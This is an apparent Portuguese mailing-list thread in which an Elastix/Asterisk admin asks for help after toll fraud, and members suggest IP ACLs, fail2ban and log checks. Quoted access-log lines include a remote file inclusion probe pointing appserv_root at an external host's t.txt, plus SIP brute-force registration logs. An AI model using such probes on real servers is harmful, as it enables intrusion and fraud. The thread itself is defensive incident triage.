é possivel limitar a quantidade de ligaçoes simultaneas por ramal? Att; Gleidison C. Sampaio From: gleidison.samp...@hotmail.com To: asteriskbrasil@listas.asteriskbrasil.org Date: Mon, 22 Nov 2010 13:23:47 -0400 Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Nielsen, Cara, rodei tudo quanto é coisa na maquina do cliente, essa parte foi facil, até porque só tem uma maquina em cada filial, nao detectei nada, até porque tem um firewall que barra tudo quanto é acesso, mais enfim o fato é que eu gostaria de saber, o que posso fazer pra tornar mais seguro pra evitar essas invasões. Att; Gleidison C. Sampaio From: niel...@freesolutions.com.br Date: Mon, 22 Nov 2010 13:51:04 -0300 To: asteriskbrasil@listas.asteriskbrasil.org Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Bom eles autenticaram numa boa ? Vc está utilizando senhas fortes ? provavelmente eles monitoraram seu server e conseguiram uma senha ... Muito estranho vc fez uma auditoria nos logs ? Pode ser que algum de seus clientes esteja com trojan, este enviou as informações e no meio delas foram os dados de autenticação. Pensou nisso tudo ? No final das contas é preciso a auditoria para identificar a origem da invasão. Em 22 de novembro de 2010 13:40, Gleidison Sampaio gleidison.samp...@hotmail.com escreveu: Sim no Elastix 1.6 ele se encontra em um Co-location dentro da GVT em uma maquina virtual, com IP Publico e tenho ramais distribuidos em 5 filiais diferentes, esses ramais estao logados atraves de Linksys SPA2102 todos estes atras de Firewall, e o que notei no CDR foi que fizeram ligaçoes apenas um ramal, e em duas horas durante a madrugada os caras arrebentaram de ligar. 2010-11-21 21:14:01 00393396976261 SIP/TRUNK SIP/TRUNKANSWERED 1045 Att; Gleidison C. Sampaio From: niel...@freesolutions.com.br Date: Mon, 22 Nov 2010 13:27:16 -0300 To: asteriskbrasil@listas.asteriskbrasil.org Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Opa, foi no seu ELASTIX 1.6? Qual a posição que se encontra seu servidor voip na sua rede ? Em 22 de novembro de 2010 13:20, Gleidison Sampaio gleidison.samp...@hotmail.com escreveu: Sidinei, Obrigado pela Resposta, cara sofri uma invasao essa madrugada, e os caras arrebentaram de ligaçoes para a Italia, abaixo peguei o seguinte log. e os caras fizeram um rombo. alguem poderia me ajudar a bloquear isso. /var/log/httpd/access_log 72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] GET /user/soapCaller.bs HTTP/1.1 302 305 - Morfeus Fucking Scanner 72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] GET /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? HTTP/1.1 302 354 - Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) Att; Gleidison C. Sampaio From: sidnei...@ig.com.br To: asteriskbrasil@listas.asteriskbrasil.org Date: Mon, 22 Nov 2010 14:00:10 -0200 Subject: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Não, pois estão todas as linhas comentadas (é só um exemplo). De: asteriskbrasil-boun...@listas.asteriskbrasil.org [mailto:asteriskbrasil-boun...@listas.asteriskbrasil.org] Em nome de Gleidison Sampaio Enviada em: segunda-feira, 22 de novembro de 2010 13:40 Para: Asterisk Lista Assunto: [AsteriskBrasil] Duvida ( SEGURANÇA ) Elastix 1.6 Boa tarde Lista! hoje fuçando nas configuraçoes do meu PBX eu abri a seguinte configuraçao, e gostaria de saber se isso da permissao a algum acesso no meu servidor /etc/asterisk/users.conf ;[6000] ;fullname = Joe User ;email = j...@foo.bar ;secret = ;zapchan = 1 ;hasvoicemail = yes ;vmsecret = ;hassip = yes ;hasiax = no ;hash323 = no ;hasmanager = no ;callwaiting = no ;context = international Att; Gleidison C. Sampaio ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Não sou a melhor pessoa para lhe responder sobre segurança no asterisk, porém tenho muitos conceitos de políticas de segurança, uma delas vc já até disse, limitar número de conexões/canais/chamadas, tem sim, uma leitura vc encontrará muitas formas de blindar o servidor. Porém nada adianta se vc tem senhas fracas. Em 22 de novembro de 2010 14:25, Gleidison Sampaio gleidison.samp...@hotmail.com escreveu: é possivel limitar a quantidade de ligaçoes simultaneas por ramal? Att; *Gleidison C. Sampaio* -- From: gleidison.samp...@hotmail.com To: asteriskbrasil@listas.asteriskbrasil.org Date: Mon, 22 Nov 2010 13:23:47 -0400 Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Nielsen, Cara, rodei tudo quanto é coisa na maquina do cliente, essa parte foi facil, até porque só tem uma maquina em cada filial, nao detectei nada, até porque tem um firewall que barra tudo quanto é acesso, mais enfim o fato é que eu gostaria de saber, o que posso fazer pra tornar mais seguro pra evitar essas invasões. Att; *Gleidison C. Sampaio* -- From: niel...@freesolutions.com.br Date: Mon, 22 Nov 2010 13:51:04 -0300 To: asteriskbrasil@listas.asteriskbrasil.org Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Bom eles autenticaram numa boa ? Vc está utilizando senhas fortes ? provavelmente eles monitoraram seu server e conseguiram uma senha ... Muito estranho vc fez uma auditoria nos logs ? Pode ser que algum de seus clientes esteja com trojan, este enviou as informações e no meio delas foram os dados de autenticação. Pensou nisso tudo ? No final das contas é preciso a auditoria para identificar a origem da invasão. Em 22 de novembro de 2010 13:40, Gleidison Sampaio gleidison.samp...@hotmail.com escreveu: Sim no Elastix 1.6 ele se encontra em um Co-location dentro da GVT em uma maquina virtual, com IP Publico e tenho ramais distribuidos em 5 filiais diferentes, esses ramais estao logados atraves de Linksys SPA2102 todos estes atras de Firewall, e o que notei no CDR foi que fizeram ligaçoes apenas um ramal, e em duas horas durante a madrugada os caras arrebentaram de ligar. 2010-11-21 21:14:01 00393396976261 SIP/TRUNK SIP/TRUNKANSWERED 1045 Att; *Gleidison C. Sampaio* -- From: niel...@freesolutions.com.br Date: Mon, 22 Nov 2010 13:27:16 -0300 To: asteriskbrasil@listas.asteriskbrasil.org Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Opa, foi no seu ELASTIX 1.6? Qual a posição que se encontra seu servidor voip na sua rede ? Em 22 de novembro de 2010 13:20, Gleidison Sampaio gleidison.samp...@hotmail.com escreveu: Sidinei, Obrigado pela Resposta, cara sofri uma invasao essa madrugada, e os caras arrebentaram de ligaçoes para a Italia, abaixo peguei o seguinte log. e os caras fizeram um rombo. alguem poderia me ajudar a bloquear isso. /var/log/httpd/access_log 72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] GET /user/soapCaller.bs HTTP/1.1 302 305 - Morfeus Fucking Scanner 72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] GET /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? HTTP/1.1 302 354 - Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) Att; *Gleidison C. Sampaio* -- From: sidnei...@ig.com.br To: asteriskbrasil@listas.asteriskbrasil.org Date: Mon, 22 Nov 2010 14:00:10 -0200 Subject: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Não, pois estão todas as linhas comentadas (é só um exemplo). *De:* asteriskbrasil-boun...@listas.asteriskbrasil.org [mailto: asteriskbrasil-boun...@listas.asteriskbrasil.org] *Em nome de *Gleidison Sampaio *Enviada em:* segunda-feira, 22 de novembro de 2010 13:40 *Para:* Asterisk Lista *Assunto:* [AsteriskBrasil] Duvida ( SEGURANÇA ) Elastix 1.6 Boa tarde Lista! hoje fuçando nas configuraçoes do meu PBX eu abri a seguinte configuraçao, e gostaria de saber se isso da permissao a algum acesso no meu servidor /etc/asterisk/users.conf ;[6000] ;fullname = Joe User ;email = j...@foo.bar ;secret = ;zapchan = 1 ;hasvoicemail = yes ;vmsecret = ;hassip = yes ;hasiax = no ;hash323 = no ;hasmanager = no ;callwaiting = no ;context = international Att; *Gleidison C. Sampaio* ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Gleidison, Sidinei, Obrigado pela Resposta, cara sofri uma invasao essa madrugada, e os caras arrebentaram de ligaçoes para a Italia, abaixo peguei o seguinte log. e os caras fizeram um rombo. alguem poderia me ajudar a bloquear isso. /var/log/httpd/access_log 72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] GET /user/soapCaller.bs HTTP/1.1 302 305 - Morfeus Fucking Scanner 72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] GET /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? HTTP/1.1 302 354 - Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) Você instalou algo mais no seu elastix? Ele faz referência a pastas que não existem no elastix 1.6 padrão, como /user/ e /appserv/ . Pelo que pesquisei na NET esse appserv é um XAMP da vida. E no seu caso, estava com falhas de segurança. Nessa segunda linha do log ele se certifica de que o servidor está 'vulnerável' e depois disso você ta frito. -- Abraço! Alejandro Flores http://www.triforsec.com.br/ ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Para vc pesquisar isto que foi usado em vc, foi um SHELLCODE. Em 22 de novembro de 2010 15:00, Alejandro Flores alejandrorflo...@gmail.com escreveu: Gleidison, Sidinei, Obrigado pela Resposta, cara sofri uma invasao essa madrugada, e os caras arrebentaram de ligaçoes para a Italia, abaixo peguei o seguinte log. e os caras fizeram um rombo. alguem poderia me ajudar a bloquear isso. /var/log/httpd/access_log 72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] GET /user/soapCaller.bs HTTP/1.1 302 305 - Morfeus Fucking Scanner 72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] GET /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? HTTP/1.1 302 354 - Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) Você instalou algo mais no seu elastix? Ele faz referência a pastas que não existem no elastix 1.6 padrão, como /user/ e /appserv/ . Pelo que pesquisei na NET esse appserv é um XAMP da vida. E no seu caso, estava com falhas de segurança. Nessa segunda linha do log ele se certifica de que o servidor está 'vulnerável' e depois disso você ta frito. -- Abraço! Alejandro Flores http://www.triforsec.com.br/ ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org -- At. Nielsen Alves de Oliveira Consultor em Sistemas Computacionais CIO Free Solutions Telefone: (65) 3025-7356 Celular: (65) 9287-5331 (Vivo) ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] GET /user/soapCaller.bs HTTP/1.1 302 305 - Morfeus Fucking Scanner 72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] GET /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? HTTP/1.1 302 354 - Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) Na verdade na verdade esses logs só mostram um robozinho de scanner de vulnerabilidades. Esses logs só mostram os caras procurando furo, porém, não tem. Encontrei entradas iguais nos logs dos meus servers, mas é só isso mesmo, algum manezão investigando tua máquina. Nesse caso, claro. Procure por aquivos estranhos no /tmp no /var/tmp, procure por processos estranhos no caso de uma invasão. No caso das ligações pra itália que você falou, eles ligaram autenticados ou anonimos? -- Abraço, Alejandro Flores http://www.triforsec.com.br/ ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Alejandro, Na verdade nao sou la aqueles especialistas, poderia me dizer onde verifico o log dos ramais, tipo o IP Publico que cada ramal se logou. Att; Gleidison C. Sampaio Date: Mon, 22 Nov 2010 15:39:10 -0300 From: alejandrorflo...@gmail.com To: asteriskbrasil@listas.asteriskbrasil.org Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] GET /user/soapCaller.bs HTTP/1.1 302 305 - Morfeus Fucking Scanner 72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] GET /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? HTTP/1.1 302 354 - Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) Na verdade na verdade esses logs só mostram um robozinho de scanner de vulnerabilidades. Esses logs só mostram os caras procurando furo, porém, não tem. Encontrei entradas iguais nos logs dos meus servers, mas é só isso mesmo, algum manezão investigando tua máquina. Nesse caso, claro. Procure por aquivos estranhos no /tmp no /var/tmp, procure por processos estranhos no caso de uma invasão. No caso das ligações pra itália que você falou, eles ligaram autenticados ou anonimos? -- Abraço, Alejandro Flores http://www.triforsec.com.br/ ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Opa, Alejandro, Na verdade nao sou la aqueles especialistas, poderia me dizer onde verifico o log dos ramais, tipo o IP Publico que cada ramal se logou. Os logs do asterisk ficam em: /var/log/asterisk/full Verifica nesse arquivo. Outra coisa é via console do asterisk executar o comando: sip show peers que vai te mostrar que ramais estão online e qual ip de origem. -- Abraço, Alejandro Flores http://www.triforsec.com.br/ ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Para minha Surpresa tem um IP dos EUA, mais tem um arquivo de log de mais de 40 mb só com essa mensagem. caso alguem tenha alguma dica, alem de reforçar a senha, que ja criei uma que EU nunca vou decorar essa senha, com caracteres, letras, numeros, maiusculas e minusculas, porem uma dica para aumentar mais a segurança vai bem, e pra garantir tbem estou subindo essa maquina em outro IP com uma faixa bem diferente. [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found[Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found[Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found[Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found[Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found Att; Gleidison C. Sampaio Date: Mon, 22 Nov 2010 16:33:22 -0300 Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 From: alejandrorflo...@gmail.com To: gleidison.samp...@hotmail.com CC: asteriskbrasil@listas.asteriskbrasil.org Opa, Alejandro, Na verdade nao sou la aqueles especialistas, poderia me dizer onde verifico o log dos ramais, tipo o IP Publico que cada ramal se logou. Os logs do asterisk ficam em: /var/log/asterisk/full Verifica nesse arquivo. Outra coisa é via console do asterisk executar o comando: sip show peers que vai te mostrar que ramais estão online e qual ip de origem. -- Abraço, Alejandro Flores http://www.triforsec.com.br/ ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
seus ramais possuem ip fixo podes utilizar os parâmetros: deny=0.0.0.0/0.0.0.0 permit=222.111.222.1/255.255.255.255 Com esses parâmetros você somente vai permitir login a partir do ip especificado... Se tiver controle de firewall, pode utilizar fail2ban... Abs Mensagem original De: Gleidison Sampaio gleidison.samp...@hotmail.com Responder a: asteriskbrasil@listas.asteriskbrasil.org Para: alejandrorflo...@gmail.com Cc: Asterisk Lista asteriskbrasil@listas.asteriskbrasil.org Assunto: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Data: Mon, 22 Nov 2010 15:49:04 -0400 Para minha Surpresa tem um IP dos EUA, mais tem um arquivo de log de mais de 40 mb só com essa mensagem. caso alguem tenha alguma dica, alem de reforçar a senha, que ja criei uma que EU nunca vou decorar essa senha, com caracteres, letras, numeros, maiusculas e minusculas, porem uma dica para aumentar mais a segurança vai bem, e pra garantir tbem estou subindo essa maquina em outro IP com uma faixa bem diferente. [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found Att; Gleidison C. Sampaio Date: Mon, 22 Nov 2010 16:33:22 -0300 Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 From: alejandrorflo...@gmail.com To: gleidison.samp...@hotmail.com CC: asteriskbrasil@listas.asteriskbrasil.org Opa, Alejandro, Na verdade nao sou la aqueles especialistas, poderia me dizer onde verifico o log dos ramais, tipo o IP Publico que cada ramal se logou. Os logs do asterisk ficam em: /var/log/asterisk/full Verifica nesse arquivo. Outra coisa é via console do asterisk executar o comando: sip show peers que vai te mostrar que ramais estão online e qual ip de origem. -- Abraço, Alejandro Flores http://www.triforsec.com.br/ ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Depois da senha estes procedimentos que o amigo postou ai (nível de rede) são os mais críticos e elimina mais de 90% dos problemas de segurança, de resto só fica a confiança no código do asterisk (nível de aplicação). =D Em 22 de novembro de 2010 17:03, Rodrigo Vian lis...@porttaltecnologia.com.br escreveu: seus ramais possuem ip fixo podes utilizar os parâmetros: deny=0.0.0.0/0.0.0.0 permit=222.111.222.1/255.255.255.255 Com esses parâmetros você somente vai permitir login a partir do ip especificado... Se tiver controle de firewall, pode utilizar fail2ban... Abs Mensagem original *De*: Gleidison Sampaio gleidison.samp...@hotmail.comgleidison%20sampaio%20%3cgleidison.samp...@hotmail.com%3e *Responder a*: asteriskbrasil@listas.asteriskbrasil.org *Para*: alejandrorflo...@gmail.com *Cc*: Asterisk Lista asteriskbrasil@listas.asteriskbrasil.orgasterisk%20lista%20%3casteriskbra...@listas.asteriskbrasil.org%3e *Assunto*: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 *Data*: Mon, 22 Nov 2010 15:49:04 -0400 Para minha Surpresa tem um IP dos EUA, mais tem um arquivo de log de mais de 40 mb só com essa mensagem. caso alguem tenha alguma dica, alem de reforçar a senha, que ja criei uma que EU nunca vou decorar essa senha, com caracteres, letras, numeros, maiusculas e minusculas, porem uma dica para aumentar mais a segurança vai bem, e pra garantir tbem estou subindo essa maquina em outro IP com uma faixa bem diferente. [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found Att; *Gleidison C. Sampaio* Date: Mon, 22 Nov 2010 16:33:22 -0300 Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 From: alejandrorflo...@gmail.com To: gleidison.samp...@hotmail.com CC: asteriskbrasil@listas.asteriskbrasil.org Opa, Alejandro, Na verdade nao sou la aqueles especialistas, poderia me dizer onde verifico o log dos ramais, tipo o IP Publico que cada ramal se logou. Os logs do asterisk ficam em: /var/log/asterisk/full Verifica nesse arquivo. Outra coisa é via console do asterisk executar o comando: sip show peers que vai te mostrar que ramais estão online e qual ip de origem. -- Abraço, Alejandro Flores http://www.triforsec.com.br/ ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões asteriskbrasil.orgasteriskbra...@listas.asteriskbrasil.orghttp://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org -- At. Nielsen Alves de Oliveira